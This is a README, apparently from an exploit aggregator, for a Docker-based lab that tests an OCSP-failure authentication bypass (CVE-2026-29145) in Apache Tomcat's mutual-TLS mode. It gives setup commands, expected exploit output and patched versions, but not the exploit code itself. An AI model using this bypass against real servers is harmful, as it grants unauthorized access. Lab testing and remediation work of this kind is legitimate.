Share
## https://sploitus.com/exploit?id=15A6CDF4-8DBB-5A3A-82E6-BBF6AC3C5629
# CVE-2026-29145 Testing Environment
## ๐ Overview
This repository contains a proof-of-concept (PoC) environment designed to test for **CVE-2026-29145**.
The vulnerability is an **authentication bypass in Apache Tomcat's Mutual TLS (CLIENT_CERT) implementation**. When OCSP (Online Certificate Status Protocol) is configured with soft-fail disabled, Tomcat may fail to treat an OCSP check failure as a hard denial. This allows a client with a potentially revoked or unverified certificate to bypass authentication if the OCSP responder is unreachable or returns an error.
## ๐ก๏ธ Vulnerability Details
| Property | Value |
|----------|-------|
| **CVE ID** | CVE-2026-29145 |
| **CVSS Score** | 9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N |
| **Attack Vector** | Network |
| **Privileges Required** | None |
| **Impact** | Authentication Bypass |
### Prerequisites for Vulnerability
- โ CLIENT_CERT authentication enabled in Tomcat
- โ OCSP revocation checking enabled
- โ Soft-fail option disabled (hard-fail mode)
- โ Unreachable or failing OCSP responder
---
## ๐ Getting Started
### Prerequisites
- **Docker & Docker Compose**: To run the vulnerable Tomcat container
- **OpenSSL**: To generate the PKI (Public Key Infrastructure) - usually pre-installed on Linux/macOS
- **Python 3.7+**: To run the testing script and mock responder
- **curl** (optional): For manual testing
### Installation & Quick Start
#### 1. Clone and setup the environment
```bash
# Navigate to the project directory
cd CVE-2026-29145-Tester
# Make scripts executable
chmod +x setup_certs.sh cleanup.sh
# Install Python dependencies
pip install -r requirements.txt
```
#### 2. Generate certificates
```bash
./setup_certs.sh
```
**What this does:**
- Creates a Root CA (Certificate Authority)
- Generates server certificate for Tomcat
- Generates client certificate with OCSP extension pointing to `http://localhost:8888`
- Validates all certificates were created successfully
**Expected output:**
```
[INFO] Starting certificate generation for CVE-2026-29145 testing environment
[INFO] OpenSSL found: OpenSSL 3.0.x (...)
[INFO] Created certs directory
[INFO] Generating Root CA...
[INFO] Generating Server Certificate...
[INFO] Generating Client Certificate with OCSP Extension...
[INFO] Certificate setup completed successfully!
```
#### 3. Start the vulnerable environment
```bash
docker-compose up -d
```
**What this does:**
- Starts the OCSP Mock Responder on port 8888 (simulates failure with HTTP 500)
- Starts vulnerable Tomcat 10.1.52 on port 8443 with CLIENT_CERT authentication
- Creates internal Docker network for service communication
- Sets up health checks for both services
**Verify containers are running:**
```bash
docker-compose ps
```
#### 4. Run the exploitation test
```bash
python poc_exploit.py
```
**Expected outputs:**
**Vulnerable System:**
```
[INFO] Attempting connection to https://localhost:8443/protected-resource...
[WARNING] VULNERABLE: Access granted despite OCSP check failure.
[WARNING] Response preview: ...
```
**Patched System:**
```
[INFO] Attempting connection to https://localhost:8443/protected-resource...
[INFO] NOT VULNERABLE: Access denied (Authentication working).
```
---
## ๐งช Testing Scenarios
| Scenario | OCSP Status | Expected (Patched) | Result (Vulnerable) | Notes |
|----------|-------------|-------------------|---------------------|-------|
| Normal Operation | Online & Valid | 200 OK โ | 200 OK โ | OCSP check succeeds, access granted |
| Soft Failure | Offline/Timeout | 403 Forbidden โ | 200 OK โ | **BYPASS** - OCSP responder unreachable |
| Hard Revocation | Online & Revoked | 403 Forbidden โ | 403 Forbidden โ | Certificate explicitly revoked |
| Invalid Certificate | Invalid Chain | 403 Forbidden โ | 403 Forbidden โ | Chain validation fails |
### Running Different Test Scenarios
**Test 1: Default (OCSP Responder Failing)**
```bash
# Keep containers running
python poc_exploit.py
```
**Test 2: Stop OCSP Responder (Simulate Timeout)**
```bash
docker-compose pause ocsp-responder
python poc_exploit.py
docker-compose unpause ocsp-responder
```
**Test 3: Manual Testing with curl**
```bash
curl -v \
--cert certs/client-cert.pem \
--key certs/client-key.pem \
--cacert certs/ca-chain.pem \
https://localhost:8443/protected-resource
```
---
## ๐ ๏ธ Project Structure
```
CVE-2026-29145-Tester/
โโโ README.md # This file
โโโ setup_certs.sh # Certificate generation script (with validation)
โโโ cleanup.sh # Cleanup and reset script
โโโ docker-compose.yml # Docker service orchestration
โโโ requirements.txt # Python dependencies
โโโ poc_exploit.py # Main testing script (with logging and error handling)
โโโ simple_proxy_fail.py # Mock OCSP responder (with detailed logging)
โโโ .gitignore # Git ignore rules for certificates and logs
โโโ certs/ # Generated certificates (created by setup_certs.sh)
โ โโโ ca-chain.pem # Root CA certificate
โ โโโ ca-key.pem # Root CA private key
โ โโโ server-cert.pem # Tomcat server certificate
โ โโโ server-key.pem # Tomcat server private key
โ โโโ client-cert.pem # Test client certificate
โ โโโ client-key.pem # Test client private key
โโโ tomcat/
โ โโโ server.xml # Vulnerable Tomcat configuration
โโโ logs/ # Tomcat logs (created at runtime)
```
---
## ๐ Configuration Details
### Server.xml Configuration (Vulnerable)
The `tomcat/server.xml` file configures:
```xml
```
**Key Settings:**
- `certificateVerification="required"` - Enforces CLIENT_CERT authentication
- `OCSP on` - Enables OCSP revocation checking
- No soft-fail override - Uses hard-fail mode (vulnerable)
### OCSP Responder Configuration
The mock OCSP responder (`simple_proxy_fail.py`):
- Listens on `localhost:8888`
- Always returns HTTP 500 (Server Error)
- Logs all incoming OCSP requests
- Simulates an unreachable/failing OCSP service
---
## ๐ง Troubleshooting
### Common Issues & Solutions
#### โ Error: "OpenSSL is not installed"
```bash
# macOS
brew install openssl
# Ubuntu/Debian
sudo apt-get install openssl
# CentOS/RHEL
sudo yum install openssl
```
#### โ Error: "Missing certificate files"
**Cause:** Certificate generation failed or was not run.
```bash
# Clean up and regenerate
rm -rf certs
./setup_certs.sh
```
#### โ Error: "Connection refused" on port 8443
**Cause:** Tomcat container is not running or not ready.
```bash
# Check container status
docker-compose ps
# Check logs
docker-compose logs vulnerable-tomcat
# Ensure both services are running and healthy
docker-compose up -d
sleep 10 # Wait for services to start
```
#### โ Error: "Connection timeout"
**Cause:** Tomcat taking too long to start or network issues.
```bash
# Check Tomcat startup logs
docker-compose logs vulnerable-tomcat
# Increase timeout and retry
timeout 30 docker-compose logs -f vulnerable-tomcat # Monitor startup
```
#### โ Error: "docker-compose: command not found"
**Cause:** Docker Compose not installed or not in PATH.
```bash
# Install Docker Compose (if using standalone)
sudo curl -L "https://github.com/docker/compose/releases/download/v2.x.x/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
# Or use docker compose (V2 integrated with Docker Desktop)
docker compose up -d
```
#### โ Error: "SSL: CERTIFICATE_VERIFY_FAILED"
**Cause:** Certificate validation failing.
```bash
# Verify certificate files exist
ls -la certs/
# Check certificate validity
openssl x509 -in certs/client-cert.pem -noout -text
```
#### โ Error: "requests.exceptions.SSLError"
**Cause:** SSL handshake failure - may indicate hard-fail is working correctly.
**Solution:** This is actually a positive sign! The hard-fail is preventing access when OCSP fails.
```bash
# Check if OCSP responder is running
docker-compose ps ocsp-responder
# View detailed error
python poc_exploit.py # Already provides detailed logging
```
#### โ Error: "Address already in use"
**Cause:** Port 8443 or 8888 is already in use.
```bash
# Find process using the port
lsof -i :8443
lsof -i :8888
# Kill the process or use different ports in docker-compose.yml
```
### Debugging & Logs
#### View detailed logs
```bash
# Tomcat logs
docker-compose logs -f vulnerable-tomcat
# OCSP responder logs
docker-compose logs -f ocsp-responder
# Python script debugging
python poc_exploit.py # Already includes detailed logging
```
#### Monitor real-time events
```bash
# Open terminal and run
docker-compose logs -f
# In another terminal, run test
python poc_exploit.py
```
#### Network debugging
```bash
# Test connectivity to OCSP responder
curl http://localhost:8888/
# Test OCSP responder from inside Tomcat container
docker exec vulnerable-tomcat curl http://ocsp-responder:8888/
# Test SSL handshake
openssl s_client -connect localhost:8443 \
-cert certs/client-cert.pem \
-key certs/client-key.pem \
-CAfile certs/ca-chain.pem
```
---
## ๐งน Cleanup
To remove all containers, volumes, certificates, and logs:
```bash
./cleanup.sh
```
**What this does:**
- Stops and removes all Docker containers
- Removes the generated `certs/` directory
- Removes the `logs/` directory
- Cleans up Python cache files
**Verify cleanup:**
```bash
docker-compose ps # Should show nothing
ls -la certs/ # Should not exist
```
---
## โ๏ธ Disclaimer
This project is for **educational and authorized security testing purposes only**.
- โ ๏ธ Only use against systems you own or have explicit written permission to test
- โ ๏ธ Using these tools against systems without authorization is **illegal** and unethical
- โ ๏ธ The authors are not responsible for any misuse of this software
- โ ๏ธ Always ensure you have proper backups before testing on production systems
---
## ๐ Remediation
To mitigate this vulnerability, upgrade Apache Tomcat to the following versions:
| Version Series | Minimum Fixed Version |
|----------------|----------------------|
| 11.0.x | 11.0.20 or later |
| 10.1.x | 10.1.53 or later |
| 9.0.x | 9.0.116 or later |
**Upgrade steps:**
```bash
# Example: Update docker-compose.yml to use patched version
# Change: image: tomcat:10.1.52-jdk17
# To: image: tomcat:10.1.53-jdk17
docker-compose down
docker-compose up -d
```
---
## ๐ References
- [CVE-2026-29145 Details](https://nvd.nist.gov/)
- [Apache Tomcat Documentation](https://tomcat.apache.org/)
- [OCSP (RFC 6960)](https://tools.ietf.org/html/rfc6960)
- [Mutual TLS (mTLS) Overview](https://en.wikipedia.org/wiki/Mutual_TLS)
---
## ๐ฌ Support
For issues, questions, or contributions, please open an issue or submit a pull request.
---
**Last Updated:** April 2026
**Status:** Testing & Documentation Complete